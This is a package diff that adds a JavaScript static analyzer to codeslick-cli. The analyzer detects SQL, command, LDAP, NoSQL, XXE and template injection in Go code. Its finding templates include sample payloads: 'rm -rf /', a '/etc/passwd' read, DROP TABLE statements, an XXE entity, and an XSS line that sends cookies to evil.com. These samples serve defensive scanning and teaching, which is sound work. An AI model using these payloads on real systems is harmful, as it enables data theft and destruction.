codeslick-cli 1.1.6 → 1.2.0

package/dist/src/lib/analyzers/go/security-checks/injection-attacks.js

@@ -0,0 +1,401 @@
+"use strict";
+/**
+ * Go Injection Attack Security Checks
+ * OWASP A03:2025 - Injection
+ *
+ * Detects SQL injection, command injection, LDAP injection, NoSQL injection,
+ * and XXE vulnerabilities in Go code. These are among the most critical security risks.
+ */
+Object.defineProperty(exports, "__esModule", { value: true });
+exports.checkInjectionAttacks = checkInjectionAttacks;
+const createVulnerability_1 = require("../utils/createVulnerability");
+/**
+ * Checks for injection attack vulnerabilities in Go code
+ *
+ * Covers:
+ * - Check #1: SQL Injection - String concatenation in database queries (CRITICAL)
+ * - Check #2: Command Injection - exec.Command with shell and user input (CRITICAL)
+ * - Check #3: LDAP Injection - Unsafe LDAP filter construction (HIGH)
+ * - Check #4: NoSQL Injection - MongoDB query construction with user input (HIGH)
+ * - Check #5: XXE - Unsafe XML parsing without DisallowDTD (HIGH)
+ * - Check #6: Template Injection - Unsafe template.HTML construction (HIGH)
+ *
+ * @param lines - Array of code lines
+ * @returns Array of security vulnerabilities found
+ */
+function checkInjectionAttacks(lines) {
+    const vulnerabilities = [];
+    let inMultiLineComment = false;
+    // Track variables with unsafe SQL queries, LDAP filters, NoSQL queries
+    const unsafeSqlVariables = new Map();
+    const unsafeLdapVariables = new Map();
+    const unsafeNoSqlVariables = new Map();
+    // =============================================================================
+    // FIRST PASS: Track unsafe variable assignments
+    // =============================================================================
+    lines.forEach((line, index) => {
+        const lineNumber = index + 1;
+        const trimmed = line.trim();
+        // Skip comments and empty lines
+        if (!trimmed || trimmed.startsWith('//'))
+            return;
+        // Track SQL query construction with string concatenation or fmt.Sprintf
+        const hasSqlKeywords = /\b(SELECT|INSERT|UPDATE|DELETE|FROM|WHERE|JOIN|UNION)\b/i.test(trimmed);
+        const hasStringConcat = /[a-zA-Z_]\s*\+|\+\s*[^\s]/.test(trimmed);
+        const hasFmtSprintf = /fmt\.Sprintf\s*\(/i.test(trimmed);
+        const varAssignment = trimmed.match(/^(\w+)\s*:?=\s*/);
+        if (varAssignment && hasSqlKeywords && (hasStringConcat || hasFmtSprintf)) {
+            const variableName = varAssignment[1];
+            unsafeSqlVariables.set(variableName, lineNumber);
+        }
+        // Track LDAP filter construction with string concatenation or fmt.Sprintf
+        const hasLdapPatterns = /\((&|\|)?(\w+)=|\(objectClass=|\(cn=/i.test(trimmed);
+        const hasLdapEscapeFilter = /ldap\.EscapeFilter/i.test(trimmed);
+        if (varAssignment && hasLdapPatterns && (hasStringConcat || hasFmtSprintf) && !hasLdapEscapeFilter) {
+            const variableName = varAssignment[1];
+            unsafeLdapVariables.set(variableName, lineNumber);
+        }
+        // Track NoSQL query construction with string concatenation or unsafe operators
+        const hasNoSqlPatterns = /bson\.(M|D)\{|\$where|mapReduce/i.test(trimmed);
+        if (varAssignment && hasNoSqlPatterns && (hasStringConcat || /\$where|mapReduce/.test(trimmed))) {
+            const variableName = varAssignment[1];
+            unsafeNoSqlVariables.set(variableName, lineNumber);
+        }
+    });
+    // =============================================================================
+    // SECOND PASS: Detect vulnerabilities
+    // =============================================================================
+    lines.forEach((line, index) => {
+        const lineNumber = index + 1;
+        const trimmed = line.trim();
+        // Track multi-line comments (/* ... */)
+        if (trimmed.includes('/*')) {
+            inMultiLineComment = true;
+        }
+        if (trimmed.includes('*/')) {
+            inMultiLineComment = false;
+            return;
+        }
+        // Skip comments and empty lines
+        if (!trimmed || inMultiLineComment || trimmed.startsWith('//')) {
+            return;
+        }
+        // =============================================================================
+        // Check #1: SQL Injection - String concatenation in database queries
+        // =============================================================================
+        // CVSS 9.8 - CRITICAL
+        // Direct inline SQL injection
+        const hasSqlMethod = /db\.(Query|Exec|QueryRow|QueryContext|ExecContext)\s*\(/i.test(trimmed);
+        const hasStringConcat = /[a-zA-Z_]\s*\+|\+\s*[^\s]/.test(trimmed);
+        const hasSqlKeywords = /\b(SELECT|INSERT|UPDATE|DELETE|FROM|WHERE|JOIN|UNION)\b/i.test(trimmed);
+        if (hasSqlMethod && (hasStringConcat || /fmt\.Sprintf/.test(trimmed)) && hasSqlKeywords) {
+            vulnerabilities.push((0, createVulnerability_1.createGoSecurityVulnerability)({
+                category: 'go-sql-injection',
+                severity: 'critical',
+                confidence: 'high',
+                message: 'SQL Injection: String concatenation or formatting in database query',
+                line: lineNumber,
+                suggestion: 'Use parameterized queries with ? placeholders',
+                owasp: 'A03:2025 - Injection',
+                cwe: 'CWE-89',
+                pciDss: 'PCI DSS 6.5.1',
+                remediation: {
+                    explanation: 'Parameterized queries separate SQL logic from data, preventing injection attacks. Go\'s database/sql package automatically escapes parameters.',
+                    before: `query := "SELECT * FROM users WHERE id = " + userID\ndb.Query(query)`,
+                    after: `query := "SELECT * FROM users WHERE id = ?"\ndb.Query(query, userID)`
+                },
+                attackVector: {
+                    description: 'An attacker can inject malicious SQL by manipulating user input that is directly concatenated into queries.',
+                    exploitExample: `userID = "1 OR 1=1 --" allows bypassing authentication\nuserID = "1; DROP TABLE users; --" enables database destruction`,
+                    realWorldImpact: [
+                        'Complete database compromise and data theft',
+                        'Authentication bypass (accessing any account)',
+                        'Data manipulation or deletion',
+                        'Privilege escalation to admin accounts'
+                    ]
+                }
+            }));
+        }
+        // Data flow tracking: Check if unsafe SQL variables are used
+        unsafeSqlVariables.forEach((declarationLine, variableName) => {
+            if (hasSqlMethod && new RegExp(`\\b${variableName}\\b`).test(trimmed)) {
+                vulnerabilities.push((0, createVulnerability_1.createGoSecurityVulnerability)({
+                    category: 'go-sql-injection',
+                    severity: 'critical',
+                    confidence: 'high',
+                    message: `SQL Injection: Using unsafe query variable '${variableName}' (defined at line ${declarationLine})`,
+                    line: lineNumber,
+                    suggestion: 'Use parameterized queries with ? placeholders',
+                    owasp: 'A03:2025 - Injection',
+                    cwe: 'CWE-89',
+                    pciDss: 'PCI DSS 6.5.1',
+                    remediation: {
+                        explanation: 'Parameterized queries separate SQL logic from data, preventing injection attacks. Go\'s database/sql package automatically escapes parameters.',
+                        before: `query := "SELECT * FROM users WHERE id = " + userID\ndb.Query(query)`,
+                        after: `query := "SELECT * FROM users WHERE id = ?"\ndb.Query(query, userID)`
+                    },
+                    attackVector: {
+                        description: 'An attacker can inject malicious SQL by manipulating user input that is directly concatenated into queries.',
+                        exploitExample: `userID = "1 OR 1=1 --" allows bypassing authentication\nuserID = "1; DROP TABLE users; --" enables database destruction`,
+                        realWorldImpact: [
+                            'Complete database compromise and data theft',
+                            'Authentication bypass (accessing any account)',
+                            'Data manipulation or deletion',
+                            'Privilege escalation to admin accounts'
+                        ]
+                    }
+                }));
+            }
+        });
+        // =============================================================================
+        // Check #2: Command Injection - exec.Command with shell and user input
+        // =============================================================================
+        // CVSS 9.8 - CRITICAL
+        const hasExecCommand = /exec\.Command\s*\(/i.test(trimmed);
+        const hasShell = /(["']sh["']|["']bash["']|["']\/bin\/sh["']|["']\/bin\/bash["'])/.test(trimmed);
+        const hasShellFlag = /(["']-c["'])/.test(trimmed);
+        if (hasExecCommand && hasShell && hasShellFlag) {
+            vulnerabilities.push((0, createVulnerability_1.createGoSecurityVulnerability)({
+                category: 'go-command-injection',
+                severity: 'critical',
+                confidence: 'high',
+                message: 'Command Injection: Using shell with exec.Command allows command injection',
+                line: lineNumber,
+                suggestion: 'Avoid shell invocation; pass command and arguments separately to exec.Command',
+                owasp: 'A03:2025 - Injection',
+                cwe: 'CWE-78',
+                pciDss: 'PCI DSS 6.5.1',
+                remediation: {
+                    explanation: 'Invoking a shell enables meta-character attacks. Pass the command and each argument as separate parameters to exec.Command to prevent injection.',
+                    before: `cmd := exec.Command("sh", "-c", "ls " + userPath)\ncmd.Run()`,
+                    after: `cmd := exec.Command("ls", userPath)\ncmd.Run()`
+                },
+                attackVector: {
+                    description: 'An attacker can inject shell commands by manipulating user input that is passed to a shell interpreter.',
+                    exploitExample: `userPath = ".; rm -rf /" executes malicious commands\nuserPath = "| cat /etc/passwd" exfiltrates sensitive data`,
+                    realWorldImpact: [
+                        'Remote Code Execution (RCE) on the server',
+                        'Complete system compromise',
+                        'Data exfiltration and theft',
+                        'Service disruption and malware installation'
+                    ]
+                }
+            }));
+        }
+        // =============================================================================
+        // Check #3: LDAP Injection - Unsafe LDAP filter construction
+        // =============================================================================
+        // CVSS 7.5 - HIGH
+        const hasLdapSearch = /ldap\.NewSearchRequest|\.Search\s*\(/i.test(trimmed);
+        const hasLdapFilter = /Filter\s*:/i.test(trimmed);
+        const hasLdapFilterPattern = /\((&|\|)?(\w+)=/i.test(trimmed);
+        // Direct inline LDAP injection
+        if ((hasLdapSearch || hasLdapFilter) && hasStringConcat && hasLdapFilterPattern) {
+            vulnerabilities.push((0, createVulnerability_1.createGoSecurityVulnerability)({
+                category: 'go-ldap-injection',
+                severity: 'high',
+                confidence: 'medium',
+                message: 'LDAP Injection: Unsafe LDAP filter construction with string concatenation',
+                line: lineNumber,
+                suggestion: 'Use ldap.EscapeFilter() to sanitize user input in LDAP filters',
+                owasp: 'A03:2025 - Injection',
+                cwe: 'CWE-90',
+                pciDss: 'PCI DSS 6.5.1',
+                remediation: {
+                    explanation: 'LDAP filters must escape special characters like parentheses, asterisks, and backslashes to prevent injection. Use ldap.EscapeFilter() on all user inputs.',
+                    before: `filter := "(&(uid=" + username + ")(password=" + password + "))"\nsearchRequest := ldap.NewSearchRequest(baseDN, ldap.ScopeWholeSubtree, ldap.NeverDerefAliases, 0, 0, false, filter, nil, nil)`,
+                    after: `import "github.com/go-ldap/ldap/v3"\nfilter := fmt.Sprintf("(&(uid=%s)(password=%s))", ldap.EscapeFilter(username), ldap.EscapeFilter(password))\nsearchRequest := ldap.NewSearchRequest(baseDN, ldap.ScopeWholeSubtree, ldap.NeverDerefAliases, 0, 0, false, filter, nil, nil)`
+                },
+                attackVector: {
+                    description: 'An attacker can manipulate LDAP queries by injecting special characters, bypassing authentication or extracting sensitive directory information.',
+                    exploitExample: `username = "*" retrieves all users\nusername = "admin)(uid=*" bypasses authentication`,
+                    realWorldImpact: [
+                        'Authentication bypass',
+                        'Unauthorized access to directory data',
+                        'Information disclosure (user emails, groups)',
+                        'Privilege escalation'
+                    ]
+                }
+            }));
+        }
+        // Data flow tracking for LDAP
+        unsafeLdapVariables.forEach((declarationLine, variableName) => {
+            if ((hasLdapSearch || hasLdapFilter) && new RegExp(`\\b${variableName}\\b`).test(trimmed)) {
+                // Check if ldap.EscapeFilter is used - if so, skip (it's safe)
+                if (/ldap\.EscapeFilter/i.test(trimmed)) {
+                    return;
+                }
+                vulnerabilities.push((0, createVulnerability_1.createGoSecurityVulnerability)({
+                    category: 'go-ldap-injection',
+                    severity: 'high',
+                    confidence: 'medium',
+                    message: `LDAP Injection: Using unsafe filter variable '${variableName}' (defined at line ${declarationLine})`,
+                    line: lineNumber,
+                    suggestion: 'Use ldap.EscapeFilter() to sanitize user input in LDAP filters',
+                    owasp: 'A03:2025 - Injection',
+                    cwe: 'CWE-90',
+                    pciDss: 'PCI DSS 6.5.1',
+                    remediation: {
+                        explanation: 'LDAP filters must escape special characters like parentheses, asterisks, and backslashes to prevent injection. Use ldap.EscapeFilter() on all user inputs.',
+                        before: `filter := "(&(uid=" + username + ")(password=" + password + "))"\nsearchRequest := ldap.NewSearchRequest(baseDN, ldap.ScopeWholeSubtree, ldap.NeverDerefAliases, 0, 0, false, filter, nil, nil)`,
+                        after: `import "github.com/go-ldap/ldap/v3"\nfilter := fmt.Sprintf("(&(uid=%s)(password=%s))", ldap.EscapeFilter(username), ldap.EscapeFilter(password))\nsearchRequest := ldap.NewSearchRequest(baseDN, ldap.ScopeWholeSubtree, ldap.NeverDerefAliases, 0, 0, false, filter, nil, nil)`
+                    },
+                    attackVector: {
+                        description: 'An attacker can manipulate LDAP queries by injecting special characters, bypassing authentication or extracting sensitive directory information.',
+                        exploitExample: `username = "*" retrieves all users\nusername = "admin)(uid=*" bypasses authentication`,
+                        realWorldImpact: [
+                            'Authentication bypass',
+                            'Unauthorized access to directory data',
+                            'Information disclosure (user emails, groups)',
+                            'Privilege escalation'
+                        ]
+                    }
+                }));
+            }
+        });
+        // =============================================================================
+        // Check #4: NoSQL Injection - MongoDB query construction with user input
+        // =============================================================================
+        // CVSS 8.1 - HIGH
+        const hasMongoQuery = /bson\.(M|D)\{|collection\.(Find|FindOne|UpdateOne|DeleteOne|MapReduce)/i.test(trimmed);
+        const hasUnsafeOperator = /\$where|mapReduce/i.test(trimmed);
+        // Direct inline NoSQL injection
+        if (hasMongoQuery && (hasStringConcat || hasUnsafeOperator)) {
+            vulnerabilities.push((0, createVulnerability_1.createGoSecurityVulnerability)({
+                category: 'go-nosql-injection',
+                severity: 'high',
+                confidence: 'medium',
+                message: 'NoSQL Injection: Unsafe MongoDB query construction with user input',
+                line: lineNumber,
+                suggestion: 'Validate and sanitize user input; avoid $where and mapReduce with untrusted data',
+                owasp: 'A03:2025 - Injection',
+                cwe: 'CWE-943',
+                pciDss: 'PCI DSS 6.5.1',
+                remediation: {
+                    explanation: 'NoSQL injection occurs when user input is directly embedded in queries without validation. Avoid operators like $where and mapReduce with untrusted input. Use type-safe bson structures.',
+                    before: `filter := bson.M{"$where": "this.username == '" + username + "'"}`,
+                    after: `// Use parameterized filters\nfilter := bson.M{"username": username}\n// Or validate input\nif !isValidUsername(username) { return errors.New("invalid username") }`
+                },
+                attackVector: {
+                    description: 'An attacker can manipulate NoSQL queries to bypass authentication, extract data, or execute arbitrary JavaScript in MongoDB.',
+                    exploitExample: `username = "' || 1==1 //" bypasses authentication\nusername = "'; db.users.drop(); //" destroys collections`,
+                    realWorldImpact: [
+                        'Authentication bypass',
+                        'Unauthorized data access',
+                        'Database manipulation or deletion',
+                        'Arbitrary code execution in MongoDB context'
+                    ]
+                }
+            }));
+        }
+        // Data flow tracking for NoSQL
+        unsafeNoSqlVariables.forEach((declarationLine, variableName) => {
+            if (hasMongoQuery && new RegExp(`\\b${variableName}\\b`).test(trimmed)) {
+                vulnerabilities.push((0, createVulnerability_1.createGoSecurityVulnerability)({
+                    category: 'go-nosql-injection',
+                    severity: 'high',
+                    confidence: 'medium',
+                    message: `NoSQL Injection: Using unsafe query variable '${variableName}' (defined at line ${declarationLine})`,
+                    line: lineNumber,
+                    suggestion: 'Validate and sanitize user input; avoid $where and mapReduce with untrusted data',
+                    owasp: 'A03:2025 - Injection',
+                    cwe: 'CWE-943',
+                    pciDss: 'PCI DSS 6.5.1',
+                    remediation: {
+                        explanation: 'NoSQL injection occurs when user input is directly embedded in queries without validation. Avoid operators like $where and mapReduce with untrusted input. Use type-safe bson structures.',
+                        before: `filter := bson.M{"$where": "this.username == '" + username + "'"}`,
+                        after: `// Use parameterized filters\nfilter := bson.M{"username": username}\n// Or validate input\nif !isValidUsername(username) { return errors.New("invalid username") }`
+                    },
+                    attackVector: {
+                        description: 'An attacker can manipulate NoSQL queries to bypass authentication, extract data, or execute arbitrary JavaScript in MongoDB.',
+                        exploitExample: `username = "' || 1==1 //" bypasses authentication\nusername = "'; db.users.drop(); //" destroys collections`,
+                        realWorldImpact: [
+                            'Authentication bypass',
+                            'Unauthorized data access',
+                            'Database manipulation or deletion',
+                            'Arbitrary code execution in MongoDB context'
+                        ]
+                    }
+                }));
+            }
+        });
+        // =============================================================================
+        // Check #5: XXE - Unsafe XML parsing without DisallowDTD
+        // =============================================================================
+        // CVSS 8.5 - HIGH
+        const hasXmlParsing = /xml\.(NewDecoder|Unmarshal|Decoder)/i.test(trimmed);
+        if (hasXmlParsing) {
+            // Check if there's any security configuration nearby (simple heuristic)
+            const nextLineIndex = index + 1;
+            const prevLineIndex = index - 1;
+            const nextLine = nextLineIndex < lines.length ? lines[nextLineIndex].trim() : '';
+            const prevLine = prevLineIndex >= 0 ? lines[prevLineIndex].trim() : '';
+            const hasSecurityConfig = /DisableExternalEntities|DisableEntityExpansion/i.test(trimmed) ||
+                /DisableExternalEntities|DisableEntityExpansion/i.test(nextLine) ||
+                /DisableExternalEntities|DisableEntityExpansion/i.test(prevLine);
+            if (!hasSecurityConfig) {
+                vulnerabilities.push((0, createVulnerability_1.createGoSecurityVulnerability)({
+                    category: 'go-xxe-vulnerability',
+                    severity: 'high',
+                    confidence: 'medium',
+                    message: 'XXE Vulnerability: XML parsing may allow external entity attacks',
+                    line: lineNumber,
+                    suggestion: 'Ensure XML parser disables external entities and DTD processing',
+                    owasp: 'A05:2025 - Security Misconfiguration',
+                    cwe: 'CWE-611',
+                    pciDss: 'PCI DSS 6.5.1',
+                    remediation: {
+                        explanation: 'XML External Entity (XXE) attacks occur when XML parsers process external entities, potentially reading local files or making SSRF requests. Disable external entity processing.',
+                        before: `decoder := xml.NewDecoder(reader)\nerr := decoder.Decode(&data)`,
+                        after: `// Go's xml package is relatively safe by default, but use a secure wrapper\n// For critical applications, consider using a library that explicitly disables entities\ndecoder := xml.NewDecoder(reader)\n// Note: Go's standard library doesn't support DTDs, but external libraries might`
+                    },
+                    attackVector: {
+                        description: 'An attacker can read local files or trigger SSRF attacks by injecting external entity references in XML input.',
+                        exploitExample: `<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>\n<!-- Reads /etc/passwd -->`,
+                        realWorldImpact: [
+                            'Local file disclosure (credentials, config files)',
+                            'Server-Side Request Forgery (SSRF)',
+                            'Denial of Service (DOS)',
+                            'Port scanning of internal network'
+                        ]
+                    }
+                }));
+            }
+        }
+        // =============================================================================
+        // Check #6: Template Injection - Unsafe template.HTML construction
+        // =============================================================================
+        // CVSS 7.5 - HIGH
+        const hasTemplateHTML = /template\.(HTML|JS|CSS|JSStr|URL)\s*\(/i.test(trimmed);
+        if (hasTemplateHTML && hasStringConcat) {
+            vulnerabilities.push((0, createVulnerability_1.createGoSecurityVulnerability)({
+                category: 'go-template-injection',
+                severity: 'high',
+                confidence: 'high',
+                message: 'Template Injection: Unsafe template.HTML() construction with user input',
+                line: lineNumber,
+                suggestion: 'Let html/template auto-escape user input; avoid template.HTML() with untrusted data',
+                owasp: 'A03:2025 - Injection',
+                cwe: 'CWE-79',
+                pciDss: 'PCI DSS 6.5.7',
+                remediation: {
+                    explanation: 'template.HTML() bypasses auto-escaping in html/template, allowing XSS attacks. Never use template.HTML() with user input. Let the template engine auto-escape by default.',
+                    before: `html := template.HTML("<div>" + userInput + "</div>")\nt.Execute(w, html)`,
+                    after: `// Pass raw data and let template auto-escape\ndata := struct{ Input string }{Input: userInput}\nt.Execute(w, data)\n// In template: <div>{{.Input}}</div>`
+                },
+                attackVector: {
+                    description: 'An attacker can inject malicious JavaScript by manipulating user input that is wrapped in template.HTML(), bypassing auto-escaping.',
+                    exploitExample: `userInput = "<script>alert(document.cookie)</script>" steals session cookies\nuserInput = "<img src=x onerror=fetch('evil.com?c='+document.cookie)>" exfiltrates data`,
+                    realWorldImpact: [
+                        'Cross-Site Scripting (XSS) attacks',
+                        'Session hijacking and cookie theft',
+                        'Account takeover',
+                        'Malware distribution'
+                    ]
+                }
+            }));
+        }
+    });
+    return vulnerabilities;
+}
+//# sourceMappingURL=injection-attacks.js.map

package/dist/src/lib/analyzers/go/security-checks/injection-attacks.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"injection-attacks.js","sourceRoot":"","sources":["../../../../../../../../src/lib/analyzers/go/security-checks/injection-attacks.ts"],"names":[],"mappings":"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